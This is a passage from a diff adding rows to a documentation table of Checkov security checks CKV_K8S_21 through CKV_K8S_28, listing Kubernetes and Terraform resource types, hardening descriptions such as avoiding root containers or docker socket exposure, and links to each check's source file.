+| 2873 | CKV_K8S_21               | resource                         | kubernetes_config_map                                                                            | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 2874 | CKV_K8S_21               | resource                         | kubernetes_config_map_v1                                                                         | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 2875 | CKV_K8S_21               | resource                         | kubernetes_cron_job                                                                              | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 2876 | CKV_K8S_21               | resource                         | kubernetes_cron_job_v1                                                                           | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 2877 | CKV_K8S_21               | resource                         | kubernetes_daemon_set_v1                                                                         | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 2878 | CKV_K8S_21               | resource                         | kubernetes_daemonset                                                                             | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 2879 | CKV_K8S_21               | resource                         | kubernetes_deployment                                                                            | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 2880 | CKV_K8S_21               | resource                         | kubernetes_deployment_v1                                                                         | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 2881 | CKV_K8S_21               | resource                         | kubernetes_ingress                                                                               | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 2882 | CKV_K8S_21               | resource                         | kubernetes_ingress_v1                                                                            | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 2883 | CKV_K8S_21               | resource                         | kubernetes_job                                                                                   | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 2884 | CKV_K8S_21               | resource                         | kubernetes_job_v1                                                                                | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 2885 | CKV_K8S_21               | resource                         | kubernetes_pod                                                                                   | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 2886 | CKV_K8S_21               | resource                         | kubernetes_pod_v1                                                                                | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 2887 | CKV_K8S_21               | resource                         | kubernetes_replication_controller                                                                | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 2888 | CKV_K8S_21               | resource                         | kubernetes_replication_controller_v1                                                             | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 2889 | CKV_K8S_21               | resource                         | kubernetes_role_binding                                                                          | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 2890 | CKV_K8S_21               | resource                         | kubernetes_role_binding_v1                                                                       | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 2891 | CKV_K8S_21               | resource                         | kubernetes_secret                                                                                | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 2892 | CKV_K8S_21               | resource                         | kubernetes_secret_v1                                                                             | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 2893 | CKV_K8S_21               | resource                         | kubernetes_service                                                                               | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 2894 | CKV_K8S_21               | resource                         | kubernetes_service_account                                                                       | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 2895 | CKV_K8S_21               | resource                         | kubernetes_service_account_v1                                                                    | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 2896 | CKV_K8S_21               | resource                         | kubernetes_service_v1                                                                            | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 2897 | CKV_K8S_21               | resource                         | kubernetes_stateful_set                                                                          | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 2898 | CKV_K8S_21               | resource                         | kubernetes_stateful_set_v1                                                                       | The default namespace should not be used                                                                                                                                                                 | Terraform               | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 2899 | CKV_K8S_22               | resource                         | CronJob                                                                                          | Use read-only filesystem for containers where possible                                                                                                                                                   | Kubernetes              | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py)                                                                                          |
+| 2900 | CKV_K8S_22               | resource                         | DaemonSet                                                                                        | Use read-only filesystem for containers where possible                                                                                                                                                   | Kubernetes              | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py)                                                                                          |
+| 2901 | CKV_K8S_22               | resource                         | Deployment                                                                                       | Use read-only filesystem for containers where possible                                                                                                                                                   | Kubernetes              | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py)                                                                                          |
+| 2902 | CKV_K8S_22               | resource                         | DeploymentConfig                                                                                 | Use read-only filesystem for containers where possible                                                                                                                                                   | Kubernetes              | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py)                                                                                          |
+| 2903 | CKV_K8S_22               | resource                         | Job                                                                                              | Use read-only filesystem for containers where possible                                                                                                                                                   | Kubernetes              | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py)                                                                                          |
+| 2904 | CKV_K8S_22               | resource                         | Pod                                                                                              | Use read-only filesystem for containers where possible                                                                                                                                                   | Kubernetes              | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py)                                                                                          |
+| 2905 | CKV_K8S_22               | resource                         | PodTemplate                                                                                      | Use read-only filesystem for containers where possible                                                                                                                                                   | Kubernetes              | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py)                                                                                          |
+| 2906 | CKV_K8S_22               | resource                         | ReplicaSet                                                                                       | Use read-only filesystem for containers where possible                                                                                                                                                   | Kubernetes              | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py)                                                                                          |
+| 2907 | CKV_K8S_22               | resource                         | ReplicationController                                                                            | Use read-only filesystem for containers where possible                                                                                                                                                   | Kubernetes              | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py)                                                                                          |
+| 2908 | CKV_K8S_22               | resource                         | StatefulSet                                                                                      | Use read-only filesystem for containers where possible                                                                                                                                                   | Kubernetes              | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py)                                                                                          |
+| 2909 | CKV_K8S_22               | resource                         | kubernetes_deployment                                                                            | Use read-only filesystem for containers where possible                                                                                                                                                   | Terraform               | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py)                                                                            |
+| 2910 | CKV_K8S_22               | resource                         | kubernetes_deployment_v1                                                                         | Use read-only filesystem for containers where possible                                                                                                                                                   | Terraform               | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py)                                                                            |
+| 2911 | CKV_K8S_22               | resource                         | kubernetes_pod                                                                                   | Use read-only filesystem for containers where possible                                                                                                                                                   | Terraform               | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py)                                                                            |
+| 2912 | CKV_K8S_22               | resource                         | kubernetes_pod_v1                                                                                | Use read-only filesystem for containers where possible                                                                                                                                                   | Terraform               | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py)                                                                            |
+| 2913 | CKV_K8S_23               | resource                         | CronJob                                                                                          | Minimize the admission of root containers                                                                                                                                                                | Kubernetes              | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py)                                                                                                  |
+| 2914 | CKV_K8S_23               | resource                         | DaemonSet                                                                                        | Minimize the admission of root containers                                                                                                                                                                | Kubernetes              | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py)                                                                                                  |
+| 2915 | CKV_K8S_23               | resource                         | Deployment                                                                                       | Minimize the admission of root containers                                                                                                                                                                | Kubernetes              | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py)                                                                                                  |
+| 2916 | CKV_K8S_23               | resource                         | Job                                                                                              | Minimize the admission of root containers                                                                                                                                                                | Kubernetes              | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py)                                                                                                  |
+| 2917 | CKV_K8S_23               | resource                         | Pod                                                                                              | Minimize the admission of root containers                                                                                                                                                                | Kubernetes              | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py)                                                                                                  |
+| 2918 | CKV_K8S_23               | resource                         | ReplicaSet                                                                                       | Minimize the admission of root containers                                                                                                                                                                | Kubernetes              | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py)                                                                                                  |
+| 2919 | CKV_K8S_23               | resource                         | ReplicationController                                                                            | Minimize the admission of root containers                                                                                                                                                                | Kubernetes              | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py)                                                                                                  |
+| 2920 | CKV_K8S_23               | resource                         | StatefulSet                                                                                      | Minimize the admission of root containers                                                                                                                                                                | Kubernetes              | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py)                                                                                                  |
+| 2921 | CKV_K8S_24               | resource                         | PodSecurityPolicy                                                                                | Do not allow containers with added capability                                                                                                                                                            | Kubernetes              | [AllowedCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesPSP.py)                                                                                  |
+| 2922 | CKV_K8S_24               | resource                         | kubernetes_pod_security_policy                                                                   | Do not allow containers with added capability                                                                                                                                                            | Terraform               | [AllowedCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesPSP.py)                                                                            |
+| 2923 | CKV_K8S_25               | resource                         | CronJob                                                                                          | Minimize the admission of containers with added capability                                                                                                                                               | Kubernetes              | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py)                                                                                        |
+| 2924 | CKV_K8S_25               | resource                         | DaemonSet                                                                                        | Minimize the admission of containers with added capability                                                                                                                                               | Kubernetes              | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py)                                                                                        |
+| 2925 | CKV_K8S_25               | resource                         | Deployment                                                                                       | Minimize the admission of containers with added capability                                                                                                                                               | Kubernetes              | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py)                                                                                        |
+| 2926 | CKV_K8S_25               | resource                         | DeploymentConfig                                                                                 | Minimize the admission of containers with added capability                                                                                                                                               | Kubernetes              | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py)                                                                                        |
+| 2927 | CKV_K8S_25               | resource                         | Job                                                                                              | Minimize the admission of containers with added capability                                                                                                                                               | Kubernetes              | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py)                                                                                        |
+| 2928 | CKV_K8S_25               | resource                         | Pod                                                                                              | Minimize the admission of containers with added capability                                                                                                                                               | Kubernetes              | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py)                                                                                        |
+| 2929 | CKV_K8S_25               | resource                         | PodTemplate                                                                                      | Minimize the admission of containers with added capability                                                                                                                                               | Kubernetes              | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py)                                                                                        |
+| 2930 | CKV_K8S_25               | resource                         | ReplicaSet                                                                                       | Minimize the admission of containers with added capability                                                                                                                                               | Kubernetes              | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py)                                                                                        |
+| 2931 | CKV_K8S_25               | resource                         | ReplicationController                                                                            | Minimize the admission of containers with added capability                                                                                                                                               | Kubernetes              | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py)                                                                                        |
+| 2932 | CKV_K8S_25               | resource                         | StatefulSet                                                                                      | Minimize the admission of containers with added capability                                                                                                                                               | Kubernetes              | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py)                                                                                        |
+| 2933 | CKV_K8S_25               | resource                         | kubernetes_deployment                                                                            | Minimize the admission of containers with added capability                                                                                                                                               | Terraform               | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py)                                                                                  |
+| 2934 | CKV_K8S_25               | resource                         | kubernetes_deployment_v1                                                                         | Minimize the admission of containers with added capability                                                                                                                                               | Terraform               | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py)                                                                                  |
+| 2935 | CKV_K8S_25               | resource                         | kubernetes_pod                                                                                   | Minimize the admission of containers with added capability                                                                                                                                               | Terraform               | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py)                                                                                  |
+| 2936 | CKV_K8S_25               | resource                         | kubernetes_pod_v1                                                                                | Minimize the admission of containers with added capability                                                                                                                                               | Terraform               | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py)                                                                                  |
+| 2937 | CKV_K8S_26               | resource                         | CronJob                                                                                          | Do not specify hostPort unless absolutely necessary                                                                                                                                                      | Kubernetes              | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py)                                                                                                              |
+| 2938 | CKV_K8S_26               | resource                         | DaemonSet                                                                                        | Do not specify hostPort unless absolutely necessary                                                                                                                                                      | Kubernetes              | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py)                                                                                                              |
+| 2939 | CKV_K8S_26               | resource                         | Deployment                                                                                       | Do not specify hostPort unless absolutely necessary                                                                                                                                                      | Kubernetes              | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py)                                                                                                              |
+| 2940 | CKV_K8S_26               | resource                         | DeploymentConfig                                                                                 | Do not specify hostPort unless absolutely necessary                                                                                                                                                      | Kubernetes              | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py)                                                                                                              |
+| 2941 | CKV_K8S_26               | resource                         | Job                                                                                              | Do not specify hostPort unless absolutely necessary                                                                                                                                                      | Kubernetes              | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py)                                                                                                              |
+| 2942 | CKV_K8S_26               | resource                         | Pod                                                                                              | Do not specify hostPort unless absolutely necessary                                                                                                                                                      | Kubernetes              | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py)                                                                                                              |
+| 2943 | CKV_K8S_26               | resource                         | PodTemplate                                                                                      | Do not specify hostPort unless absolutely necessary                                                                                                                                                      | Kubernetes              | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py)                                                                                                              |
+| 2944 | CKV_K8S_26               | resource                         | ReplicaSet                                                                                       | Do not specify hostPort unless absolutely necessary                                                                                                                                                      | Kubernetes              | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py)                                                                                                              |
+| 2945 | CKV_K8S_26               | resource                         | ReplicationController                                                                            | Do not specify hostPort unless absolutely necessary                                                                                                                                                      | Kubernetes              | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py)                                                                                                              |
+| 2946 | CKV_K8S_26               | resource                         | StatefulSet                                                                                      | Do not specify hostPort unless absolutely necessary                                                                                                                                                      | Kubernetes              | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py)                                                                                                              |
+| 2947 | CKV_K8S_26               | resource                         | kubernetes_deployment                                                                            | Do not specify hostPort unless absolutely necessary                                                                                                                                                      | Terraform               | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py)                                                                                                        |
+| 2948 | CKV_K8S_26               | resource                         | kubernetes_deployment_v1                                                                         | Do not specify hostPort unless absolutely necessary                                                                                                                                                      | Terraform               | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py)                                                                                                        |
+| 2949 | CKV_K8S_26               | resource                         | kubernetes_pod                                                                                   | Do not specify hostPort unless absolutely necessary                                                                                                                                                      | Terraform               | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py)                                                                                                        |
+| 2950 | CKV_K8S_26               | resource                         | kubernetes_pod_v1                                                                                | Do not specify hostPort unless absolutely necessary                                                                                                                                                      | Terraform               | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py)                                                                                                        |
+| 2951 | CKV_K8S_27               | resource                         | CronJob                                                                                          | Do not expose the docker daemon socket to containers                                                                                                                                                     | Kubernetes              | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py)                                                                                          |
+| 2952 | CKV_K8S_27               | resource                         | DaemonSet                                                                                        | Do not expose the docker daemon socket to containers                                                                                                                                                     | Kubernetes              | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py)                                                                                          |
+| 2953 | CKV_K8S_27               | resource                         | Deployment                                                                                       | Do not expose the docker daemon socket to containers                                                                                                                                                     | Kubernetes              | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py)                                                                                          |
+| 2954 | CKV_K8S_27               | resource                         | Job                                                                                              | Do not expose the docker daemon socket to containers                                                                                                                                                     | Kubernetes              | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py)                                                                                          |
+| 2955 | CKV_K8S_27               | resource                         | Pod                                                                                              | Do not expose the docker daemon socket to containers                                                                                                                                                     | Kubernetes              | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py)                                                                                          |
+| 2956 | CKV_K8S_27               | resource                         | ReplicaSet                                                                                       | Do not expose the docker daemon socket to containers                                                                                                                                                     | Kubernetes              | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py)                                                                                          |
+| 2957 | CKV_K8S_27               | resource                         | ReplicationController                                                                            | Do not expose the docker daemon socket to containers                                                                                                                                                     | Kubernetes              | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py)                                                                                          |
+| 2958 | CKV_K8S_27               | resource                         | StatefulSet                                                                                      | Do not expose the docker daemon socket to containers                                                                                                                                                     | Kubernetes              | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py)                                                                                          |
+| 2959 | CKV_K8S_27               | resource                         | kubernetes_daemon_set_v1                                                                         | Do not expose the docker daemon socket to containers                                                                                                                                                     | Terraform               | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py)                                                                                    |
+| 2960 | CKV_K8S_27               | resource                         | kubernetes_daemonset                                                                             | Do not expose the docker daemon socket to containers                                                                                                                                                     | Terraform               | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py)                                                                                    |
+| 2961 | CKV_K8S_27               | resource                         | kubernetes_deployment                                                                            | Do not expose the docker daemon socket to containers                                                                                                                                                     | Terraform               | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py)                                                                                    |
+| 2962 | CKV_K8S_27               | resource                         | kubernetes_deployment_v1                                                                         | Do not expose the docker daemon socket to containers                                                                                                                                                     | Terraform               | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py)                                                                                    |
+| 2963 | CKV_K8S_27               | resource                         | kubernetes_pod                                                                                   | Do not expose the docker daemon socket to containers                                                                                                                                                     | Terraform               | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py)                                                                                    |
+| 2964 | CKV_K8S_27               | resource                         | kubernetes_pod_v1                                                                                | Do not expose the docker daemon socket to containers                                                                                                                                                     | Terraform               | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py)                                                                                    |
+| 2965 | CKV_K8S_28               | resource                         | CronJob                                                                                          | Minimize the admission of containers with the NET_RAW capability                                                                                                                                         | Kubernetes              | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py)                                                                                              |
+| 2966 | CKV_K8S_28               | resource                         | DaemonSet                                                                                        | Minimize the admission of containers with the NET_RAW capability                                                                                                                                         | Kubernetes              | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py)                                                                                              |
+| 2967 | CKV_K8S_28               | resource                         | Deployment                                                                                       | Minimize the admission of containers with the NET_RAW capability                                                                                                                                         | Kubernetes              | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py)                                                                                              |
+| 2968 | CKV_K8S_28               | resource                         | DeploymentConfig                                                                                 | Minimize the admission of containers with the NET_RAW capability                                                                                                                                         | Kubernetes              | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py)                                                                                              |
+| 2969 | CKV_K8S_28               | resource                         | Job                                                                                              | Minimize the admission of containers with the NET_RAW capability                                                                                                                                         | Kubernetes              | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py)                                                                                              |
+| 2970 | CKV_K8S_28               | resource                         | Pod                                                                                              | Minimize the admission of containers with the NET_RAW capability                                                                                                                                         | Kubernetes              | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py)                                                                                              |
+| 2971 | CKV_K8S_28               | resource                         | PodTemplate                                                                                      | Minimize the admission of containers with the NET_RAW capability                                                                                                                                         | Kubernetes              | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py)                                                                                              |
+| 2972 | CKV_K8S_28               | resource                         | ReplicaSet                                                                                       | Minimize the admission of containers with the NET_RAW capability                                                                                                                                         | Kubernetes              | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py)                                                                                              |
+| 2973 | CKV_K8S_28               | resource                         | ReplicationController                                                                            | Minimize the admission of containers with the NET_RAW capability                                                                                                                                         | Kubernetes              | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py)                                                                                              |
+| 2974 | CKV_K8S_28               | resource                         | StatefulSet                                                                                      | Minimize the admission of containers with the NET_RAW capability                                                                                                                                         | Kubernetes              | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py)                                                                                              |
+| 2975 | CKV_K8S_28               | resource                         | kubernetes_deployment                                                                            | Minimize the admission of containers with the NET_RAW capability                                                                                                                                         | Terraform               | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py)                                                                                        |
+| 2976 | CKV_K8S_28               | resource                         | kubernetes_deployment_v1                                                                         | Minimize the admission of containers with the NET_RAW capability                                                                                                                                         | Terraform               | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py)                                                                                        |
